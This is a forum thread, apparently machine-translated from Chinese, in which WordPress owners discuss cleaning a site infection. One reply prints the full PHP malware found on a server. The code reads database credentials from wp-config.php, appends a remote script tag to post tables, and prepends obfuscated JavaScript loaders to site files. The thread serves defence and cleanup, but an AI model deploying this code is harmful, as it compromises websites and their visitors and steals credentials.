随机Java脚本不断在每个页面上添加我的WordPress网站，我应该如何删除它们

一些恶意软件进入我的WordPress网站，他们在每个帖子和页面中插入这些类型的脚本，我如何删除它，这样我就不必手动逐个

他们甚至在robots.txt中插入了这个脚本；在每个媒体项目的描述中

Crome Inspect。。。编辑器


" <script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script> "

首先逐个禁用插件，以查明罪魁祸首是否来自某个插件。然后，如果它没有消失，请尝试更改主题。

或者，只下载整个文件夹并使用grep4win之类的东西在整个文件夹中搜索特定字符串可能会更容易(在您的情况下是js.donatelloflowfirst(

检查您的publich.html目录。。也许你会发现一个名为：a的文件这是一个注入的恶意软件注入代码

<script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script>

到每个帖子和每个index.php文件

10小时前我遇到了同样的问题，我已经清理了我的网站

这是_a恶意软件文件的内容：

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors',1);

search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","wp-config.php");
die();

function get_var_reg($pat,$text) {

if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}

return "";
}
function search_file_ms($dir,$file_to_search){
$search_array = array();
$files = scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_ms( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {

show_sitenames($path);



}
} else if($value != "." && $value != "..") {
@search_file_ms($path, $file_to_search);
}  
} 
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {


$db = get_var_reg("'DB_NAME'.*?,.*?['|"](.*?)['|"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|"](.*?)['|"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|"](.*?)['|"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|"](.*?)['|"]",$content);

// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {

} else { 

$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "js.donatelloflowfirstly.ga") === false){
if(strpos($val, "js.donatelloflowfirstly.ga") === false){


$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];

} else {

}
} 
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it($path);
} }else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}  
} 
}
function search_file_index($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

search_file_index( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it_index($path);
} }else if($value != "." && $value != "..") {
search_file_index($path, $file_to_search);
}  
} 
}
function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_js( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
make_it_js($path);
} }else if($value != "." && $value != "..") {
search_file_js($path, $file_to_search);
}  
} 
}
function make_it_js($f){
$g = file_get_contents($f);


if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {
} else {
$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."rn";
}

}
function make_it_index($f){
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false || strpos($g, 'js.donatelloflowfirstly.ga') !== false) {
} else {
$l2 = "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."rn";

}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {
} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}

}
}

正如您所看到的，代码显示了DB登录信息，并将脚本代码注入到任何index.php文件中，主题函数也是如此。

我在数据库中进行了搜索和替换，并从所有wpposts表中清除了这段代码并且几乎删除了所有插件，因为它感染了整个主目录中的任何index.php文件。

它可以像这样位于header.php中https://gist.github.com/riper81/70e6fa8ac703d105490b6f5bb1708436

但现在删除它毫无意义。首先，您需要了解黑客是如何进入服务器的，并修复漏洞。它可能是同一服务器上的wordpress引擎/插件、主题(甚至不活动(/自定义脚本/其他网站的易受攻击版本。

我感染了这种病毒，几乎每天晚上10点他们都会攻击我的网站。尽管我已经清理了上面提到的所有恶意软件。刚才，我发现有点不正常。我检查了一下，在这个被黑客入侵的网站的数据库中，有一个奇怪的用户名，里面有我从未添加的所有特权用户。也许他们通过这些特权用户注入恶意软件。现在我删除了这些特权用户，我们将看看接下来会发生什么。希望这能解决问题。

我已经被这个恶意软件的第二波攻击了，它在周五行动，这是我第一次从数据库中清理所有脚本，搜索"donatello"；，找到条目后，我向银行进行了更新：UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src = 'https: //js.donatelloflowfirstly.ga/stat.js? n = ns1 ′ type =' text / javascript '> </script>”,' ') );

然后只有一张senama重新开始工作，上周五它回来了，我找不到这些唱片，似乎表演方式发生了变化。我刚刚发现它在主题的FUNCTIONS.PHP和HEADER.PHP文件的第一行中，我删除了这些行，它又工作了，但我仍然不知道问题的根源。

相关内容

最新更新

热门标签：